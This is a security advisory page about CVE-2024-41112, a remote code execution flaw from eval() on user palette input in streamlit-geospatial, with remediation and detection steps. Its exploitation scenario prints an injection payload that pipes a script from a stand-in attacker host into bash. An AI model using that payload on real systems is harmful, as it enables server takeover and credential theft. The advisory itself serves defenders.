CVE-2024-41112: streamlit-geospatial: RCE via eval() on palette input
CRITICAL PoC AVAILABLE CISA: TRACK*A CVSS 9.8 unauthenticated RCE in streamlit-geospatial allows any internet-accessible instance to be fully compromised by submitting a crafted palette value. No authentication, no user interaction — one HTTP request yields code execution on the server. If your team runs this app or any Streamlit app with eval() on user input, treat it as actively exploited: patch or take offline immediately.
Risk Assessment
Severity is maximum by every metric: network-accessible, zero privileges, zero user interaction, full C/I/A impact. The eval() pattern on unsanitized input is trivially exploitable — no AI/ML knowledge required, only a basic understanding of Python. Geospatial ML apps are frequently deployed for internal analysts on lightly hardened infrastructure, increasing blast radius. The fix is a single commit and confirmed in the advisory; unpatched instances have no compensating controls short of network isolation.
Affected Systems
| Package | Ecosystem | Vulnerable Range | Patched |
|---|---|---|---|
| streamlit-geospatial | pip | — | No patch |
Do you use streamlit-geospatial? You're affected.
Severity & Risk
Attack Surface
Recommended Action
5 steps-
Patch: Update to or beyond commit c4f81d9616d40c60584e36abb15300853a66e489 immediately.
-
If patching is delayed, restrict access via firewall or VPN — never expose Streamlit apps to the public internet without auth.
-
Audit all other Streamlit pages and custom apps for eval()/exec() calls on user-controlled input; replace with allowlist validation.
-
Detection: Search server logs for unusual palette parameter values containing Python keywords (import, os, subprocess, open).
-
Rotate any secrets (cloud credentials, API keys) stored as env vars on affected hosts as a precaution.
CISA SSVC Assessment
Source: CISA Vulnrichment (SSVC v2.0). Decision based on the CISA Coordinator decision tree.
Classification
Compliance Impact
This CVE is relevant to:
Frequently Asked Questions
What is CVE-2024-41112?
A CVSS 9.8 unauthenticated RCE in streamlit-geospatial allows any internet-accessible instance to be fully compromised by submitting a crafted palette value. No authentication, no user interaction — one HTTP request yields code execution on the server. If your team runs this app or any Streamlit app with eval() on user input, treat it as actively exploited: patch or take offline immediately.
Is CVE-2024-41112 actively exploited?
Proof-of-concept exploit code is publicly available for CVE-2024-41112, increasing the risk of exploitation.
How to fix CVE-2024-41112?
1. Patch: Update to or beyond commit c4f81d9616d40c60584e36abb15300853a66e489 immediately. 2. If patching is delayed, restrict access via firewall or VPN — never expose Streamlit apps to the public internet without auth. 3. Audit all other Streamlit pages and custom apps for eval()/exec() calls on user-controlled input; replace with allowlist validation. 4. Detection: Search server logs for unusual palette parameter values containing Python keywords (import, os, subprocess, open). 5. Rotate any secrets (cloud credentials, API keys) stored as env vars on affected hosts as a precaution.
What systems are affected by CVE-2024-41112?
This vulnerability affects the following AI/ML architecture patterns: Streamlit-based ML UIs, geospatial ML pipelines, data science app servers, shared ML platforms.
What is the CVSS score for CVE-2024-41112?
CVE-2024-41112 has a CVSS v3.1 base score of 9.8 (CRITICAL). The EPSS exploitation probability is 1.56%.
Technical Details
NVD Description
streamlit-geospatial is a streamlit multipage app for geospatial applications. Prior to commit c4f81d9616d40c60584e36abb15300853a66e489, the palette variable in `pages/1_📷_Timelapse.py` takes user input, which is later used in the `eval()` function on line 380, leading to remote code execution. Commit c4f81d9616d40c60584e36abb15300853a66e489 fixes this issue.
Exploitation Scenario
Attacker discovers a publicly accessible streamlit-geospatial instance via Shodan or a Google dork for Streamlit on common ports (8501, 8080). They navigate to the Timelapse page and submit a crafted palette parameter containing Python code — e.g., __import__('os').system('curl attacker.com/shell.sh | bash'). The server's eval() executes the payload, establishing a reverse shell. From there, the attacker extracts AWS/GCP credentials from the environment, exfiltrates geospatial datasets and any co-located ML model artifacts, and pivots to internal services reachable from the data-science network segment.
Weaknesses (CWE)
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H References
- github.com/opengeos/streamlit-geospatial/blob/4b89495f3bdd481998aadf1fc74b10de0f71c237/pages/1_%F0%9F%93%B7_Timelapse.py Product
- github.com/opengeos/streamlit-geospatial/blob/4b89495f3bdd481998aadf1fc74b10de0f71c237/pages/1_%F0%9F%93%B7_Timelapse.py Product
- github.com/opengeos/streamlit-geospatial/commit/c4f81d9616d40c60584e36abb15300853a66e489 Patch
- securitylab.github.com/advisories/GHSL-2024-100_GHSL-2024-108_streamlit-geospatial/ Exploit 3rd Party
- github.com/fkie-cad/nvd-json-data-feeds Exploit
Timeline
Related Vulnerabilities
CVE-2024-41116 9.8 streamlit-geospatial: RCE via eval() injection
Same package: streamlit CVE-2024-41113 9.8 streamlit-geospatial: RCE via eval() in Timelapse page
Same package: streamlit CVE-2024-41114 9.8 streamlit-geospatial: RCE via eval() on palette input
Same package: streamlit CVE-2024-41115 9.8 streamlit-geospatial: eval() injection enables RCE
Same package: streamlit CVE-2024-41117 9.8 streamlit-geospatial: eval() injection allows RCE
Same package: streamlit
AI Threat Alert